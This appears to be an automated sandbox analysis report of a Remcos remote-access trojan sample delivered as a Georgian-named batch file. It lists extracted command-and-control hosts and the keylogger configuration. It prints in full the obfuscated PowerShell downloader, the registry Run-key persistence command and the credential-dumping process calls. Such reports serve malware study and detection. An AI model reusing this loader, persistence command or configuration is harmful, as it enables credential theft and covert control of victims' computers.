Overview
overview
10Static
static
131032025_1...at.zip
windows11-21h2-x64
31032025_1...at.zip
windows10-2004-x64
31032025_1...at.zip
windows10-ltsc_2021-x64
31032025_1...at.zip
windows11-21h2-x64
31032025_1...at.zip
android-9-x86
31032025_1...at.zip
android-13-x64
31032025_1...at.zip
macos-10.15-amd64
31032025_1...at.zip
ubuntu-18.04-amd64
31032025_1...at.zip
debian-9-armhf
31032025_1...at.zip
debian-9-mips
31032025_1...at.zip
debian-9-mipsel
2025.02.22...��.bat
windows10-2004-x64
102025.02.22...��.bat
windows10-2004-x64
102025.02.22...��.bat
windows10-ltsc_2021-x64
82025.02.22...��.bat
windows11-21h2-x64
102025.02.22...��.bat
android-9-x86
2025.02.22...��.bat
android-13-x64
2025.02.22...��.bat
macos-10.15-amd64
2025.02.22...��.bat
ubuntu-18.04-amd64
2025.02.22...��.bat
debian-9-armhf
2025.02.22...��.bat
debian-9-mips
2025.02.22...��.bat
debian-9-mipsel
Analysis
-
max time kernel
119s -
max time network
109s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
31/03/2025, 15:20
Static task
static1
Behavioral task
behavioral1
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win11-20250313-en
Behavioral task
behavioral2
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win10v2004-20250314-en
Behavioral task
behavioral3
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral4
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
win11-20250314-en
Behavioral task
behavioral5
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
android-x86-arm-20240910-en
Behavioral task
behavioral6
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
android-33-x64-arm64-20240910-en
Behavioral task
behavioral7
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
macos-20241106-en
Behavioral task
behavioral8
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral9
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral10
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral11
Sample
31032025_1511_2025.02.222 n.ts შპს განსხვავებული.bat.zip
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral12
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win10v2004-20250313-en
Behavioral task
behavioral13
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win10v2004-20250314-en
Behavioral task
behavioral14
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win10ltsc2021-20250314-en
Behavioral task
behavioral15
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
win11-20250314-en
Behavioral task
behavioral16
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
android-x86-arm-20240910-en
Behavioral task
behavioral17
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
android-33-x64-arm64-20240910-en
Behavioral task
behavioral18
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
macos-20241101-en
Behavioral task
behavioral19
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral20
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral21
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral22
Sample
2025.02.222 n.ts შპს განსხვავებული.bat
Resource
debian9-mipsel-20240729-en
General
-
Target
2025.02.222 n.ts შპს განსხვავებული.bat
-
Size
3KB
-
MD5
1db91aace1aac9f3e07036598aeaa98b
-
SHA1
c8f4074759f0ea7eef262c36163db7868c6503f7
-
SHA256
3d5032b506dcc1626efecbebb7f97ff8539200b6090fffa96ef6090d7082d249
-
SHA512
9f5e409c1d48c3fddb13085949a4141962000fcf45614cf6feff841d6331adec33cfd95d9836761436e6fed4b87136d730396da9ac89c065fe76f264b5d98de4
Malware Config
Extracted
remcos
Sending
jamourtg6hansit1.duckdns.org:3980
jamourtg6hansit1.duckdns.org:3981
jamourtg6hansit2.duckdns.org:3980
jamourtg6hansit3.duckdns.org:3980
jamourtg6hansit4.duckdns.org:3980
jamourtg6hansit5.duckdns.org:3980
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
hjlbtisot.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
kmportsrgsd-ZX0BIK
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 4 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral12/memory/5848-74-0x0000000000400000-0x000000000047D000-memory.dmp Nirsoft behavioral12/memory/4044-78-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral12/memory/5848-76-0x0000000000400000-0x000000000047D000-memory.dmp Nirsoft behavioral12/memory/656-84-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral12/memory/4044-78-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral12/memory/5848-74-0x0000000000400000-0x000000000047D000-memory.dmp WebBrowserPassView behavioral12/memory/5848-76-0x0000000000400000-0x000000000047D000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 6 IoCs
flow pid Process 15 5904 powershell.exe 53 684 msiexec.exe 59 684 msiexec.exe 63 684 msiexec.exe 64 684 msiexec.exe 66 684 msiexec.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 5904 powershell.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts recover.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3446877943-4095308722-756223633-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Entrochus = "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\\Software\\Forlydes\\').GetValue('coxswains');%Reimburses% ($Frynsernes143)" reg.exe -
pid Process 3484 powershell.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 684 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3484 powershell.exe 684 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 684 set thread context of 5848 684 msiexec.exe 111 PID 684 set thread context of 4044 684 msiexec.exe 112 PID 684 set thread context of 656 684 msiexec.exe 114 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 5904 powershell.exe 5904 powershell.exe 3484 powershell.exe 3484 powershell.exe 3484 powershell.exe 3484 powershell.exe 5848 recover.exe 5848 recover.exe 656 recover.exe 656 recover.exe 5848 recover.exe 5848 recover.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 3484 powershell.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe 684 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 5904 powershell.exe Token: SeDebugPrivilege 3484 powershell.exe Token: SeDebugPrivilege 656 recover.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1596 wrote to memory of 5904 1596 cmd.exe 86 PID 1596 wrote to memory of 5904 1596 cmd.exe 86 PID 3484 wrote to memory of 684 3484 powershell.exe 104 PID 3484 wrote to memory of 684 3484 powershell.exe 104 PID 3484 wrote to memory of 684 3484 powershell.exe 104 PID 3484 wrote to memory of 684 3484 powershell.exe 104 PID 684 wrote to memory of 2700 684 msiexec.exe 108 PID 684 wrote to memory of 2700 684 msiexec.exe 108 PID 684 wrote to memory of 2700 684 msiexec.exe 108 PID 2700 wrote to memory of 3060 2700 cmd.exe 110 PID 2700 wrote to memory of 3060 2700 cmd.exe 110 PID 2700 wrote to memory of 3060 2700 cmd.exe 110 PID 684 wrote to memory of 5848 684 msiexec.exe 111 PID 684 wrote to memory of 5848 684 msiexec.exe 111 PID 684 wrote to memory of 5848 684 msiexec.exe 111 PID 684 wrote to memory of 5848 684 msiexec.exe 111 PID 684 wrote to memory of 4044 684 msiexec.exe 112 PID 684 wrote to memory of 4044 684 msiexec.exe 112 PID 684 wrote to memory of 4044 684 msiexec.exe 112 PID 684 wrote to memory of 4044 684 msiexec.exe 112 PID 684 wrote to memory of 5544 684 msiexec.exe 113 PID 684 wrote to memory of 5544 684 msiexec.exe 113 PID 684 wrote to memory of 5544 684 msiexec.exe 113 PID 684 wrote to memory of 656 684 msiexec.exe 114 PID 684 wrote to memory of 656 684 msiexec.exe 114 PID 684 wrote to memory of 656 684 msiexec.exe 114 PID 684 wrote to memory of 656 684 msiexec.exe 114
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2025.02.222 n.ts შპს განსხვავებული.bat" bcdedit /c set delete /r readonly /f force /t 21⤵
- Suspicious use of WriteProcessMemory
PID:1596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Entrochus" /t REG_EXPAND_SZ /d "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\Software\Forlydes\').GetValue('coxswains');%Reimburses% ($Frynsernes143)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Entrochus" /t REG_EXPAND_SZ /d "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\Software\Forlydes\').GetValue('coxswains');%Reimburses% ($Frynsernes143)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3060
-
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\nscrjpuseqhqhnbhaylxjx"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5848
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\xmhbkhflayzvrtpljiyzukljj"3⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4044
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\aouukapnnhriuilpbtkafpyasztf"3⤵PID:5544
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\aouukapnnhriuilpbtkafpyasztf"3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:656
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5167549d428c8639f7fd4e74e015cf15c
SHA13aad86a96a1f5be662d2f1e0ae163be3aadbbed3
SHA256dc8fc1d706f11bcceadbdd29b6fe466b955369e2b1237367952ada4f40696f33
SHA512b84f09252dab74b4fce6c231dc02e0d529d7794aafaccc93540f771b5e97bb33e2ab149b61f6f3c67b653731e139cf727db82b3f30e27dbd5e5bbfcd970096df
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5ba3d01ab9cfce4601fa1862582597bd5
SHA1db2ab6b2568176b3a1ec78ca7a9df71a08959538
SHA256e79f55fbd37cf82b8968653ce63053d34dae0140773587336a540c7edb0b08eb
SHA51293d5bda703a39d0ef10b6b6136461a8f4e85aeb1c7b7260183fb2d20da17fefe7b4c4b189a7e0f4cf19f673c43ef2981e2795197f6ba9a47a13d64855744cb58
-
Filesize
561KB
MD5fe566224082e2fd8765e323a73a2d9f2
SHA186a2fd4c14b36fc636efdfa6713ba3a3ae149937
SHA25652de732643d3945e5e12154ea8dd7f8643419e5432b8ee9059c32c250532f772
SHA5122c7c37d9c1cebc9915b082e0db60a41b8afffba7d6e35c115fa2ee98a0ac3f7fc28b5e55f019da852d4a7597644f0587fa370233f59101d37e7db303f06c4886